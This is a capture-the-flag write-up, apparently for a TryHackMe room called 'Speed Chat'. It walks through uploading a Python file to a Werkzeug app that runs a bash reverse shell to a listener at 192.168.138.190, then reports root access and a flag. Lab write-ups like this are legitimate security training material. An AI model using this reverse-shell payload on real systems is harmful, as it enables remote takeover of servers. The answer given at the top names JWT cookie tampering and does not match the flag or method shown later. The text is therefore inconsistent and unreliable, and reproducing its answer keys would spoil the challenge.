Task 1. Speed Chat
What is the flag?
THM{v4l3nt1n3_jwt_c00k13_t4mp3r_4dm1n_sh0p}
Accessing the Website
I started the room and noticed that most of the basic enumeration had already been taken care of. This allowed me to move quickly toward interacting with the application itself instead of spending time on discovery.
The target application was exposed on port 5000, so I accessed it directly through the browser.
Navigating the Web Application
Once the page loaded, I explored the available functionality. One of the first things that stood out was a profile picture upload feature, which looked like a potential entry point for interaction.
While interacting with the application, I observed that messages were being handled through an API. This indicated that there was backend communication happening that might be useful later.
I then inspected the HTTP response headers and identified the server details:
Server: Werkzeug/3.1.5 Python/3.10.12
This confirmed that the application was running on a Python-based backend using Werkzeug.
Exploitation
To test for possible code execution through the upload functionality, I crafted a simple Python reverse shell.
cat << 'EOF' > test.py
import os
os.system("bash -c 'bash -i >& /dev/tcp/192.168.138.190/1234 0>&1'")
EOF
Before uploading the file, I set up a listener on my machine to catch the incoming connection.
nc -lnvp 1234
After uploading the payload, I received a reverse shell connection successfully.
Flag
With shell access established, I checked my privileges and confirmed that I was running as root. From there, I navigated through the system to locate the flag.
THM{R3v3rs3_Sh3ll_L0v3_C0nn3ct10ns}
This room was a fast-paced challenge that focused on quick interaction and exploitation. The flow from identifying functionality to gaining shell access was straightforward but required attention to detail.